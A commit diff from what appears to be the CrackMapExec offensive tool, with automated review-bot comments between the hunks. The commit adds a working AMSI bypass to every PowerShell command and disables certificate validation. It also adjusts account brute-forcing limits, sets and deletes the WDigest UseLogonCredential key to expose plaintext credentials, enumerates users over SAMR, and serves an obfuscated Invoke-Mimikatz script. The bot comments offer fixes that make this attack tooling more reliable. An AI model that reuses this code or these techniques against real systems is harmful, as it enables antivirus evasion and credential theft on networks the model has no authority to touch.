Implemented @mattifestation's AMSI bypass and multiple bugfixes

- @mattifestation's AMSI bypass now gets called before executing
  powershell commands or scripts

- Squashed some bugs related to account bruteforcing, enumerating users
  and creating/deleting the UseLogonCredential reg key
byt3bl33d3r 2016-08-06 10:28:16 -06:00
parent 8ddfcb10e4
commit 6f2596902c
5 changed files with 31 additions and 11 deletions


@ -211,10 +211,10 @@ class Connection:
if not domain: domain = self.domain
if self.args.domain: domain = self.args.domain
if credtype == 'hash' and not self.over_fail_limit():
if credtype == 'hash' and not self.over_fail_limit(username):
self.hash_login(domain, username, password)
elif credtype == 'plaintext' and not self.over_fail_limit():
elif credtype == 'plaintext' and not self.over_fail_limit(username):
self.plaintext_login(domain, username, password)
except IndexError:
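Review bot: When over_fail_limit(username) is true on L20/L23 the login attempt is skipped with no output, so unless over_fail_limit logs it itself the operator cannot distinguish a credential that was never tried from one that failed. A short comment on the guard, `# per-account attempt cap; presumably to stay under the lockout threshold — confirm in over_fail_limit`, plus an `else:` branch with `self.logger.debug('Fail limit reached for {}, skipping attempt'.format(username))` would make the behaviour visible. The enclosing Connection method starts and ends outside this hunk.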


@ -22,7 +22,7 @@ class WDIGEST:
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00')
rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1)
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
@ -46,15 +46,26 @@ class WDIGEST:
ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
keyHandle = ans['phkResult']
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
try:
rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except:
self.logger.success('UseLogonCredential registry key not present')
try:
remoteOps.finish()
except:
pass
return
try:
#Check to make sure the reg key is actually deleted
rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException:
self.logger.success('UseLogonCredential registry key deleted successfully')
try:
remoteOps.finish()
except:
pass
try:
remoteOps.finish()
except:
pass
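Review bot: The bare `except:` on L41 turns every failure of hBaseRegDeleteValue — access denied, a dropped RPC connection, an invalid handle — into the success message 'UseLogonCredential registry key not present', so a value that was never removed is reported as gone. Catch DCERPCException instead, treat only a not-found error code (ERROR_FILE_NOT_FOUND, 2) as "already absent", and log anything else as a failure, assuming the logger exposes an error level alongside success. The post-delete check has the mirror gap: if hBaseRegQueryValue on L50 returns normally the value is still present, yet that path logs nothing and the method ends as if it succeeded. The three copies of the `remoteOps.finish()` cleanup collapse into one `finally:`; the rewrite below covers the body from the delete call onward, and the method's beginning lies outside the hunk.
```python
# … unchanged: open the WDigest key and take keyHandle from the result …
try:
    rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
except DCERPCException as e:
    # Only "not found" means the value was already absent; anything else is a real failure
    if e.get_error_code() == 2:  # ERROR_FILE_NOT_FOUND
        self.logger.success('UseLogonCredential registry key not present')
    else:
        self.logger.error('Failed to delete UseLogonCredential: {}'.format(e))
else:
    try:
        #Check to make sure the reg key is actually deleted
        rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
    except DCERPCException:
        self.logger.success('UseLogonCredential registry key deleted successfully')
    else:
        self.logger.error('UseLogonCredential registry key still present after delete')
finally:
    try:
        remoteOps.finish()
    except:
        pass
```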


@ -60,7 +60,7 @@ class SAMRDump:
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(self.__port)
if hasattr(rpctransport, setRemoteHost):
if hasattr(rpctransport, 'setRemoteHost'):
rpctransport.setRemoteHost(self.__addr)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.


@ -3,6 +3,7 @@ import string
import re
import cme
import os
import logging
from base64 import b64encode
from termcolor import colored
@ -43,7 +44,15 @@ def obfs_ps_script(script, function_name=None):
return strippedCode
def create_ps_command(ps_command, force_ps32=False):
ps_command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + ps_command
ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
try{{
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}}catch{{}}
{}
""".format(ps_command)
logging.debug('Unincoded command:\n' + ps_command)
if force_ps32:
command = """$command = '{}'
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
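Review bot: The debug line on L92 misspells its label ('Unincoded') and builds the message eagerly with `+`; `logging.debug('Unencoded command:\n%s', ps_command)` fixes both and defers formatting until debug output is actually enabled. That line also writes the complete command to the debug log, including any credentials a caller may have embedded in ps_command, which deserves a comment such as `# NOTE: full command is logged at DEBUG — may contain secrets` so operators know what their log retention holds. The new `import logging` on L79 is used through the root logger; a module-level `logger = logging.getLogger(__name__)` is the usual convention and lets the module's output be filtered separately. create_ps_command continues past the end of this hunk.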


@ -55,7 +55,7 @@ class CMEModule:
request.send_response(200)
request.end_headers()
with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)